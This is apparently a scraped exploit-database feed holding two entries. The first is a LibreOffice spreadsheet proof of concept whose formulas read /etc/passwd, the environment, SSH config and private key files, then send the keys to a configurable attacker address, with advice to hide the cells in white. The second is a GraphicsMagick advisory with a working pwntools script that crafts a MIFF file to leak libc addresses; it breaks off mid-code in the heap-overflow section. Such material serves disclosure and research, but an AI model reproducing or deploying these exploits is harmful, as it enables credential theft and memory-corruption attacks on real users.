xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\">\r\n <office:automatic-styles>\r\n <style:style style:name=\"co1\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co2\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co3\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co4\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co5\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co6\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/>\r\n </style:style>\r\n <style:style style:name=\"ro1\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ro2\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/>\r\n </style:style>\r\n <style:style style:name=\"ro3\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\">\r\n <style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/>\r\n </style:style>\r\n <style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/>\r\n <style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:text-properties style:use-window-font-color=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:table-cell-properties fo:background-color=\"#f3715a\"/>\r\n </style:style>\r\n <style:page-layout style:name=\"pm1\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/>\r\n </style:footer-style>\r\n </style:page-layout>\r\n <style:page-layout style:name=\"pm2\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:footer-style>\r\n </style:page-layout>\r\n </office:automatic-styles>\r\n <office:body>\r\n <office:spreadsheet>\r\n <table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/>\r\n <table:table table:name=\"Sheet1\" table:style-name=\"ta1\">\r\n <table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"8\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell table:number-columns-repeated=\"9\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro2\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Current user:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\">\r\n <text:p>689</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\">\r\n <text:p>676</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>http://localhost:8080</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro3\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>List of private keys:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\"/>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Send:</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>0 (default path)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"5\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\">\r\n <text:p>1</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\">\r\n <text:p>132</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\">\r\n <text:p>109</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\">\r\n <text:p>96</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\">\r\n <text:p>2</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\">\r\n <text:p>297</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\">\r\n <text:p>259</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\">\r\n <text:p>246</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\">\r\n <text:p>3</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\">\r\n <text:p>436</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\">\r\n <text:p>409</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\">\r\n <text:p>396</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\">\r\n <text:p>4</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\">\r\n <text:p>586</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\">\r\n <text:p>563</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\">\r\n <text:p>550</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\">\r\n <text:p>5</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\">\r\n <text:p>718</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\">\r\n <text:p>695</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\">\r\n <text:p>682</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\">\r\n <text:p>6</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\">\r\n <text:p>882</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\">\r\n <text:p>860</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\">\r\n <text:p>847</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\">\r\n <text:p>7</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\">\r\n <text:p>1267</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\">\r\n <text:p>1240</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\">\r\n <text:p>1227</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\">\r\n <text:p>8</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\">\r\n <text:p>1408</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\">\r\n <text:p>1383</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\">\r\n <text:p>1370</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\">\r\n <text:p>9</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n </table:table>\r\n <table:named-expressions/>\r\n </office:spreadsheet>\r\n </office:body>\r\n</office:document>\r\n```", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44022/"}, {"lastseen": "2017-11-03T20:31:35", "bulletinFamily": "exploit", "description": "GraphicsMagick - Memory Disclosure / Heap Overflow. CVE-2017-16352,CVE-2017-16353. Dos exploit for Multiple platform", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "id": "EDB-ID:43111", "href": "https://www.exploit-db.com/exploits/43111/", "type": "exploitdb", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n\r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n\r\nThe vulnerabilities found are:\r\n\r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n\r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n\r\n\r\nVulnerabilities details\r\n\r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n\r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n\r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n\r\nThe code which triggers the vulnerable code path is:\r\n\r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n\r\n\r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n\r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n\r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n\r\n\r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n\r\n\r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n\r\n\r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n\r\n\r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n\r\n\r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n\r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n\r\nProof of Concept\r\n\r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n\r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n\r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n\r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 